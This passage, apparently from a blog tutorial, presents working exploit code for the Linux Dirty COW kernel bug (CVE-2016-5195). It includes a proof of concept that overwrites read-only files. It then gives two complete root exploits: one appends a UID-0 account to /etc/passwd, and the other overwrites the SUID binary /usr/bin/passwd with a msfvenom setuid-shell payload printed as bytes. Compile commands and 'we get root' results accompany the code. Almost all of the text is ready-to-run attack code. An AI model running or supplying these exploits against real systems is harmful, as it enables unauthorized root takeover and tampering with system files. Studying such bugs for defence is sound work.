void * writeThread(void * argv);

int main(int argc, char ** argv)
{
    if (argc < 3)
    {
        puts("usage: ./poc destination_file fake_file");
        return 0;
    }

    pthread_t write_thread, madvise_thread;

    int dst_fd, fk_fd;
    dst_fd = open(argv[1], O_RDONLY);
    fk_fd = open(argv[2], O_RDONLY);
    printf("fd of dst: %d\nfd of fk: %d\n", dst_fd, fk_fd);

    fstat(dst_fd, &dst_st); // get destination file length
    fstat(fk_fd, &fk_st); // get fake file length
    map = mmap(NULL, dst_st.st_size, PROT_READ, MAP_PRIVATE, dst_fd, 0);

    fake_content = malloc(fk_st.st_size);
    read(fk_fd, fake_content, fk_st.st_size);

    pthread_create(&madvise_thread, NULL, madviseThread, NULL);
    pthread_create(&write_thread, NULL, writeThread, NULL);

    pthread_join(madvise_thread, NULL);
    pthread_join(write_thread, NULL);

    return 0;
}

void * writeThread(void * argv)
{
    int mm_fd = open("/proc/self/mem", O_RDWR);
    printf("fd of mem: %d\n", mm_fd);
    for (int i = 0; i < 0x100000; i++)
    {
        lseek(mm_fd, (off_t) map, SEEK_SET);
        write(mm_fd, fake_content, fk_st.st_size);
    }

    return NULL;
}

void * madviseThread(void * argv)
{
    for (int i = 0; i < 0x100000; i++){
        madvise(map, 0x100, MADV_DONTNEED);
    }

    return NULL;
}

With our PoC, we successfully overwrite a read-only file.

Privilege escalation

1. Add a new root-privileged user

We can modify /etc/passwd to add a new user with root privileges, and get root by logging in as that user.

/**
 * 
 * CVE-2016-5195
 * dirty C-O-W
 * exploit by arttnba3
 * 2021.5.24
 *  
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <crypt.h>

struct stat passwd_st;
void * map;
char *fake_user;
int fake_user_length;

pthread_t write_thread, madvise_thread;

struct Userinfo
{
    char *username;
    char *hash;
    int user_id;
    int group_id;
    char *info;
    char *home_dir;
    char *shell;
}hacker = 
{
    .user_id = 0,
    .group_id = 0,
    .info = "a3pwn",
    .home_dir = "/root",
    .shell = "/bin/bash",
};

void * madviseThread(void * argv);
void * writeThread(void * argv);

int main(int argc, char ** argv)
{
    int passwd_fd;

    if (argc < 3)
    {
        puts("usage: ./dirty username password");
        puts("do not forget to make a backup for the /etc/passwd by yourself");
        return 0;
    }

    hacker.username = argv[1];
    hacker.hash = crypt(argv[2], argv[1]);

    fake_user_length = snprintf(NULL, 0, "%s:%s:%d:%d:%s:%s:%s\n", 
        hacker.username, 
        hacker.hash, 
        hacker.user_id, 
        hacker.group_id, 
        hacker.info, 
        hacker.home_dir, 
        hacker.shell);
    fake_user = (char * ) malloc(fake_user_length + 0x10);

    sprintf(fake_user, "%s:%s:%d:%d:%s:%s:%s\n", 
        hacker.username, 
        hacker.hash, 
        hacker.user_id, 
        hacker.group_id, 
        hacker.info, 
        hacker.home_dir, 
        hacker.shell);

    
    passwd_fd = open("/etc/passwd", O_RDONLY);
    printf("fd of /etc/passwd: %d\n", passwd_fd);

    fstat(passwd_fd, &passwd_st); // get /etc/passwd file length
    map = mmap(NULL, passwd_st.st_size, PROT_READ, MAP_PRIVATE, passwd_fd, 0);

    pthread_create(&madvise_thread, NULL, madviseThread, NULL);
    pthread_create(&write_thread, NULL, writeThread, NULL);

    pthread_join(madvise_thread, NULL);
    pthread_join(write_thread, NULL);

    return 0;
}

void * writeThread(void * argv)
{
    int mm_fd = open("/proc/self/mem", O_RDWR);
    printf("fd of mem: %d\n", mm_fd);
    for (int i = 0; i < 0x10000; i++)
    {
        lseek(mm_fd, (off_t) map, SEEK_SET);
        write(mm_fd, fake_user, fake_user_length);
    }

    return NULL;
}

void * madviseThread(void * argv)
{
    for (int i = 0; i < 0x10000; i++){
        madvise(map, 0x100, MADV_DONTNEED);
    }

    return NULL;
}

Don’t forget to link with -lcrypt when compiling.

gcc dirty.c -o dirty -static -lpthread -lcrypt

Run it, and we get root.

2. Privilege escalation via SUID

We can also overwrite an SUID program (which runs with the privileges of its owner) with malicious code to achieve privilege escalation. I chose to overwrite /usr/bin/passwd here.

I used msfvenom to construct the payload as below:

msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i

/**
 * 
 * CVE-2016-5195
 * dirty C-O-W
 * poc by arttnba3
 * 2021.4.14
 *  
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

struct stat dst_st, fk_st;
void * map;
char *fake_content;

unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
  0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
  0x6a, 0x3b, 0x58, 0x0f, 0x05
};
unsigned int sc_len = 149;

void * madviseThread(void * argv);
void * writeThread(void * argv);

int main(int argc, char ** argv)
{
    pthread_t write_thread, madvise_thread;

    int dst_fd, fk_fd;
    dst_fd = open("/usr/bin/passwd", O_RDONLY);
    printf("fd of dst: %d\n", dst_fd);

    fstat(dst_fd, &dst_st); // get destination file length
    map = mmap(NULL, dst_st.st_size, PROT_READ, MAP_PRIVATE, dst_fd, 0);

    pthread_create(&madvise_thread, NULL, madviseThread, NULL);
    pthread_create(&write_thread, NULL, writeThread, NULL);

    pthread_join(madvise_thread, NULL);
    pthread_join(write_thread, NULL);

    return 0;
}

void * writeThread(void * argv)
{
    int mm_fd = open("/proc/self/mem", O_RDWR);
    printf("fd of mem: %d\n", mm_fd);
    for (int i = 0; i < 0x10000; i++)
    {
        lseek(mm_fd, (off_t) map, SEEK_SET);
        write(mm_fd, sc, sc_len);
    }

    return NULL;
}

void * madviseThread(void * argv)
{
    for (int i = 0; i < 0x10000; i++){
        madvise(map, 0x100, MADV_DONTNEED);
    }

    return NULL;
}

Run it, and we get root.